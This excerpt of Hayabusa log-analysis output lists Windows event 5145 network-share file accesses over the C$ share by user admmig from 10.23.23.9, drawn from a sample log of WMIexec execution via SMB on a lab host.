10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# : IP Address: 
